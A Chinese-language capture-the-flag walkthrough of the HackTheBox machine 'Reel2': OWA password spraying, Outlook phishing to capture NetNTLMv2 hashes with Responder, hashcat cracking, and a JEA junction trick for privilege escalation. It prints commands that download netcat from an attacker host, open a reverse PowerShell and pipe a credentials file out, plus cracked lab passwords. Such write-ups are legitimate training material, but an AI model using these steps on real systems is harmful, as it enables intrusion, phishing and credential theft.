Reel2 - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/281

• 10.10.10.210

端口扫描

$ nmap -sC -sV 10.10.10.210
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-02 13:18 CST
Nmap scan report for 10.10.10.210
Host is up (0.069s latency).
Not shown: 991 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: 403 - Forbidden: Access is denied.
443/tcp  open  ssl/http   Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=Reel2
| Subject Alternative Name: DNS:Reel2, DNS:Reel2.htb.local
| Not valid before: 2020-07-30T10:12:46
|_Not valid after:  2025-07-30T10:12:46
|_ssl-date: 2020-11-02T05:20:05+00:00; 0s from scanner time.
6001/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open  msrpc      Microsoft Windows RPC
6006/tcp open  msrpc      Microsoft Windows RPC
6007/tcp open  msrpc      Microsoft Windows RPC
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.32
|_http-title: Welcome | Wallstant
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.46 seconds

80

80访问是403:

443

443直接访问是IIS默认页面：

8080

8080随意注册登录进去，里面有一些用户名可以提取出来作为用户名字典,并且处理一下不同格式：

usernames

names.txt

cube cube
cube0x0 cube0x0
sven svensson
lars larsson
jenny adams
teresa trump

UserName.py

#!/usr/bin/env python
import sys
import os.path

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("usage: {} names.txt".format((sys.argv[0])))
        sys.exit(0)

    if not os.path.exists(sys.argv[1]):
        print("{} not found".format(sys.argv[1]))
        sys.exit(0)

    for line in open(sys.argv[1]):
        name = ''.join([c for c in line if  c == " " or  c.isalpha()])

        tokens = name.lower().split()

        # skip empty lines
        if len(tokens) < 1:
            continue

        fname = tokens[0]
        lname = tokens[-1]

        print(fname + lname)           # johndoe
        print(lname + fname)           # doejohn
        print(fname + "." + lname)     # john.doe
        print(lname + "." + fname)     # doe.john
        print(lname + fname[0])        # doej
        print(fname[0] + lname)        # jdoe
        print(lname[0] + fname)        # djoe
        print(fname[0] + "." + lname)  # j.doe
        print(lname[0] + "." + fname)  # d.john
        print(fname)                   # john
        print(lname)                   # joe

usernames

cubecube
cubecube
cube.cube
cube.cube
cubec
ccube
ccube
c.cube
c.cube
cube
cube
cubexcubex
cubexcubex
cubex.cubex
cubex.cubex
cubexc
ccubex
ccubex
c.cubex
c.cubex
cubex
cubex
svensvensson
svenssonsven
sven.svensson
svensson.sven
svenssons
ssvensson
ssven
s.svensson
s.sven
sven
svensson
larslarsson
larssonlars
lars.larsson
larsson.lars
larssonl
llarsson
llars
l.larsson
l.lars
lars
larsson
jennyadams
adamsjenny
jenny.adams
adams.jenny
adamsj
jadams
ajenny
j.adams
a.jenny
jenny
adams
teresatrump
trumpteresa
teresa.trump
trump.teresa
trumpt
ttrump
tteresa
t.trump
t.teresa
teresa
trump

目录扫描

因为前面443直接访问是默认页面，直接扫描目录,发现一个owa目录，这是exchange：

gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50

/public (Status: 302)
/exchange (Status: 302)
/Public (Status: 302)
/rpc (Status: 401)
/owa (Status: 301)

passwords

前面8080那里有一句‘This summer is so hot!’，这个其实是密码提示，直接把所有summer密码提取出来作为密码字典：

➜  Reel2 cat /usr/share/wordlists/rockyou.txt | grep Summer > pass.txt
➜  Reel2 cat pass.txt
Summer
Summer1
Summer07
Summer08
Summer06
Summer05
Summer01
Summer99
Summer11
Summer2007
Summertime
Summer04
Summer03
Summer2
Summer12
Summer09
Summer!
Summer13
Summer123
Summerland
Summer7
Summer69
Summer5
Summer24
Summer22
Summer02
Summers
Summerof69
Summer9
Summer8
Summer4
Summer3
Summer2009
Summer2008
Summer2005
Summer18
Summer00
Summersalt
Summer_87
SummerSun
SummerOf69
Summer88
Summer87
Summer86
Summer83
Summer77
Summer73
Summer27
Summer26
Summer25
Summer23
Summer21
Summer2006
Summer1975
Summer2020
Summer16
Summer10
Summer07!
Summer0
Summer.
Summer#5
BuffySummers
2Summer
Summeryay
Summervirgo
Summertje26481
Summertime@6
Summertime321
Summertime2
Summertime1606
Summertime07
Summertime06
Summertime04
Summertime03
Summersunset1
Summerstar
Summersky
Summerside
Summers25!
Summers1
Summers08
Summers01
Summerrain1
SummerofLove
Summerof2007
Summerof2005
Summerocks21
Summernights
Summermist
Summerlynn24
Summerlyn6891
Summerlovin25
Summerlovin
Summerloven
Summerlove16
Summerlol
Summerlin22
Summerlee3
Summerland58
Summerisover1
Summerhill
Summerheat12
Summerhayes
Summergrl18
Summerglenn
Summergirl94
Summerg!rl!17
Summerfun99
Summerfun2006
Summerfun2
Summerfun
Summerfest
Summercem1905
Summerbjs1
Summeraye1
Summer_dog
SummerRiver
SummerOpen
SummerNats20
SummerNats
SummerMelody
SummerMay
SummerLuv1
SummerLove
SummerJubilee1
SummerHill
SummerHalliday92
SummerGirl
SummerG411
SummerG1
SummerDay18
SummerD15
SummerBreeze
SummerBay
SummerB21
SummerAngel0805
Summer@189
Summer@008
Summer><4691
Summer;
Summer98
Summer95
Summer93
Summer901
Summer90
Summer7k
Summer79
Summer78*
Summer78
Summer701
Summer68
Summer66
Summer64
Summer61
Summer58
Summer57
Summer566
Summer524
Summer5!
Summer4me
Summer4986
Summer4677
Summer456
Summer45
Summer44
Summer365
Summer34
Summer3232
Summer2k7
Summer2Winter
Summer284Time
Summer2425
Summer2311
Summer2310
Summer219
Summer2100
Summer21*
Summer2010
Summer2002
Summer17
Summer150207
Summer15
Summer14+
Summer14
Summer1313
Summer124#
Summer11Blueyes
Summer1029
Summer101
Summer098
Summer08,,x*
Summer078
Summer001!
Summer0!
Summer.07
Summer-leeAlbert
Summer-feild
Summer-Dayzes
Summer#69
Summer!9
Summer!!
Summer breaak
Spring2Summer
ShiatsuSummer2007
SSummer905
LongHotSummer
LisaSummers
JamienSummerRae
DonnaSummerHero
BabySummer
BSummers*
4Summer
2546Summer
21Summer
1Summer
19Summerlee
12Summer
0Summertime
000Summer
(Summertime)

爆破OWA

现在我们有用户名密码字典，有OWA，需要做的就是爆破OWA，OWA爆破有专门的工具：

• https://github.com/byt3bl33d3r/SprayingToolkit

(密码是Summer2020，前面的字典可能没有这么新的，自己生成下也可以)

python3 ../tools/SprayingToolkit/atomizer.py  owa 10.10.10.210 passwords.txt names.txt -i 0:0:01
[*] Trying to find autodiscover URL
[+] Using OWA autodiscover URL: https://10.10.10.210/autodiscover/autodiscover.xml
[+] OWA domain appears to be hosted internally
[+] Got internal domain name using OWA: HTB
[*] Starting spray at 2020-11-02 05:52:52 UTC
...
[+] Found credentials: s.svensson:Summer2020
...

登录进去，语言有点坑，需要网页翻译：

hash窃取

根据已有条件搜索得到利用方式：

• NetNTLMv2 hash stealing using Outlook - Red Teaming Experiments
  https://www.ired.team/offensive-security/initial-access/netntlmv2-hash-stealing-using-outlook

就是群发钓鱼邮件，开着 Responder监听，得到hash：

还有Responder在mac下有问题，切换到kali虚拟机运行了，并且需要稍微等一会儿，得到hash：

sudo responder -I tun0

hash crack

[HTTP] NTLMv2 Client   : 10.10.10.210
[HTTP] NTLMv2 Username : htb\k.svensson
[HTTP] NTLMv2 Hash     : k.svensson::htb:ec98350342dd9944:EFF17420424C1C052103254AFCC5A8D9:0101000000000000C6282765E4B0D601100845EF44E2D90E000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C00080030003000000000000000000000000040000090FD6E60D9736C5278A4A765E1E90D9A046F9ACEF2B49B66919ACBC3BA8E37310A001000000000000000000000000000000000000900200048005400540050002F00310030002E00310030002E00310034002E00310032000000000000000000

sudo hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force
...
K.SVENSSON::htb:ec98350342dd9944:eff17420424c1c052103254afcc5a8d9:0101000000000000c6282765e4b0d601100845ef44e2d90e000000000200060053004d0042000100160053004d0042002d0054004f004f004c004b00490054000400120073006d0062002e006c006f00630061006c000300280073006500720076006500720032003000300033002e0073006d0062002e006c006f00630061006c000500120073006d0062002e006c006f00630061006c00080030003000000000000000000000000040000090fd6e60d9736c5278a4a765e1e90d9a046f9acef2b49b66919acbc3ba8e37310a001000000000000000000000000000000000000900200048005400540050002f00310030002e00310030002e00310034002e00310032000000000000000000:kittycat1
...

破解出来密码是kittycat1,用户名是k.svensson

user flag

然后因为服务器没开winrm，所以需要通过powershell去登录：

apt install gss-ntlmssp # 重要，kali有powershell，但不装这个的话连接报错
apt install powershell

➜  ~ pwsh
...
     
PS /home/miao> $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson

PowerShell credential request
Enter your credentials.
Password for user k.svensson: *********

PS /home/miao> Enter-PSSession $offsec_session
[10.10.10.210]: PS>

然后这个powershell连接不能直接用ls,cd之类的，需要一点技巧：

• powershell - Can you change the behavior of Out-Default for a script? - Stack Overflow
  https://stackoverflow.com/questions/18082746/can-you-change-the-behavior-of-out-default-for-a-script

之后就是去读取user.txt:

reverse shell

直接反弹个powershell方便后续操作：

&{ iwr -uri http://10.10.14.12:9999/nc64.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'}
&{ cd 'C:\Windows\System32\spool\drivers\color\'}
&{ ./nc.exe 10.10.14.12 4445 -e powershell.exe}

提权信息

前面也看到在用户目录桌面有个Sticky Notes.lnk，跟进去，在”C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb>”发现一个log文件，里面有一组账号密码：

nc.exe 10.10.14.12 4444 < "C:\users\k.svensson\appdata\roaming\stickynotes\Local Storage/leveldb\000003.log"

{"first":"<p>Credentials for JEA</p><p>jea_test_account:Ab!Q@vcg^%@#1</p>","back":"rgb(255, 242, 171)","title":"rgb(255, 235, 129)","wid":"350","hei":"375","deleted":"no","closed":"yes","locked":"no"}

jea_test_account:Ab!Q@vcg^%@#1

然后在C:\Users\k.svensson\Documents目录有两个文件,

根据内容我们可以知道这个用户可以获取C:\ProgramData目录下文件内容，那么我们可以考虑做一个软链接，把Administrator用户目录链接到C:\ProgramData下

jea_test_account.psrc

@{

# ID used to uniquely identify this document
GUID = '08c0fdac-36ef-43b5-931f-68171c4c8200'

# Author of this document
Author = 'cube0x0'

# Description of the functionality provided by these settings
# Description = ''

# Company associated with this document
CompanyName = 'Unknown'

# Copyright statement for this document
Copyright = '(c) 2020 cube0x0. All rights reserved.'

# Modules to import when applied to a session
# ModulesToImport = 'MyCustomModule', @{ ModuleName = 'MyCustomModule'; ModuleVersion = '1.0.0.0'; GUID = '4d30d5f0-cb16-4898-812d-f20a6c596bdf' }

# Aliases to make visible when applied to a session
# VisibleAliases = 'Item1', 'Item2'

# Cmdlets to make visible when applied to a session
# VisibleCmdlets = 'Invoke-Cmdlet1', @{ Name = 'Invoke-Cmdlet2'; Parameters = @{ Name = 'Parameter1'; ValidateSet = 'Item1', 'Item2' }, @{ Name = 'Parameter2'; ValidatePattern = 'L*' } }

# Functions to make visible when applied to a session
# VisibleFunctions = 'Invoke-Function1', @{ Name = 'Invoke-Function2'; Parameters = @{ Name = 'Parameter1'; ValidateSet = 'Item1', 'Item2' }, @{ Name = 'Parameter2'; ValidatePattern = 'L*' } }

# External commands (scripts and applications) to make visible when applied to a session
# VisibleExternalCommands = 'Item1', 'Item2'

# Providers to make visible when applied to a session
# VisibleProviders = 'Item1', 'Item2'

# Scripts to run when applied to a session
# ScriptsToProcess = 'C:\ConfigData\InitScript1.ps1', 'C:\ConfigData\InitScript2.ps1'

# Aliases to be defined when applied to a session
# AliasDefinitions = @{ Name = 'Alias1'; Value = 'Invoke-Alias1'}, @{ Name = 'Alias2'; Value = 'Invoke-Alias2'}

# Functions to define when applied to a session
FunctionDefinitions = @{
    'Name' = 'Check-File'
    'ScriptBlock' = {param($Path,$ComputerName=$env:COMPUTERNAME) [bool]$Check=$Path -like "D:\*" -or $Path -like "C:\ProgramData\*" ; if($check) {get-content $Path}} }

# Variables to define when applied to a session
# VariableDefinitions = @{ Name = 'Variable1'; Value = { 'Dynamic' + 'InitialValue' } }, @{ Name = 'Variable2'; Value = 'StaticInitialValue' }

# Environment variables to define when applied to a session
# EnvironmentVariables = @{ Variable1 = 'Value1'; Variable2 = 'Value2' }

# Type files (.ps1xml) to load when applied to a session
# TypesToProcess = 'C:\ConfigData\MyTypes.ps1xml', 'C:\ConfigData\OtherTypes.ps1xml'

# Format files (.ps1xml) to load when applied to a session
# FormatsToProcess = 'C:\ConfigData\MyFormats.ps1xml', 'C:\ConfigData\OtherFormats.ps1xml'

# Assemblies to load when applied to a session
# AssembliesToLoad = 'System.Web', 'System.OtherAssembly, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'

}

jea_test_account.pssc

@{

# Version number of the schema used for this document
SchemaVersion = '2.0.0.0'

# ID used to uniquely identify this document
GUID = 'd6a39756-aa53-4ef6-a74b-37c6a80fd796'

# Author of this document
Author = 'cube0x0'

# Description of the functionality provided by these settings
# Description = ''

# Session type defaults to apply for this session configuration. Can be 'RestrictedRemoteServer' (recommended), 'Empty', or 'Default'
SessionType = 'RestrictedRemoteServer'

# Directory to place session transcripts for this session configuration
# TranscriptDirectory = 'C:\Transcripts\'

# Whether to run this session configuration as the machine's (virtual) administrator account
RunAsVirtualAccount = $true

# Scripts to run when applied to a session
# ScriptsToProcess = 'C:\ConfigData\InitScript1.ps1', 'C:\ConfigData\InitScript2.ps1'

# User roles (security groups), and the role capabilities that should be applied to them when applied to a session
RoleDefinitions = @{
    'htb\jea_test_account' = @{
        'RoleCapabilities' = 'jea_test_account' } }

# Language mode to apply when applied to a session. Can be 'NoLanguage' (recommended), 'RestrictedLanguage', 'ConstrainedLanguage', or 'FullLanguage'
LanguageMode = 'NoLanguage'

}

提权

直接软链接，然后jea_test_account去读取root.txt:

# target powershell
New-Item -ItemType Junction -Path 'C:\ProgramData\miao' -Target 'C:\Users\Administrator'

# local pwsh
PS /home/miao> $username = "jea_test_account"
PS /home/miao> $password = ConvertTo-SecureString "Ab!Q@vcg^%@#1" -AsPlainText -Force
PS /home/miao> $cred = New-Object System.Management.Automation.PSCredential -ArgumentList ($username, $password)
PS /home/miao> Enter-PSSession -Computer 10.10.10.210 -credential $cred -ConfigurationName jea_test_account -verbose -debug -Authentication Negotiate
[10.10.10.210]: PS>Check-File C:\programdata\miao\Desktop\root.txt
5914fa1b443305f23ba79db43a27e5dd

参考资料

• UserName.py - Pastebin.com
  https://pastebin.com/QXrDwkW2
• https://github.com/byt3bl33d3r/SprayingToolkit
• NetNTLMv2 hash stealing using Outlook - Red Teaming Experiments
  https://www.ired.team/offensive-security/initial-access/netntlmv2-hash-stealing-using-outlook
• powershell - Can you change the behavior of Out-Default for a script? - Stack Overflow
  https://stackoverflow.com/questions/18082746/can-you-change-the-behavior-of-out-default-for-a-script
• Hack-The-Box-walkthrough[reel2] | lUc1f3r11’s blog
  https://fdlucifer.github.io/2020/10/13/reel2/
• Reel2 Detailed Writeup | RaidForums
  https://raidforums.com/Thread-Tutorial-Reel2-Detailed-Writeup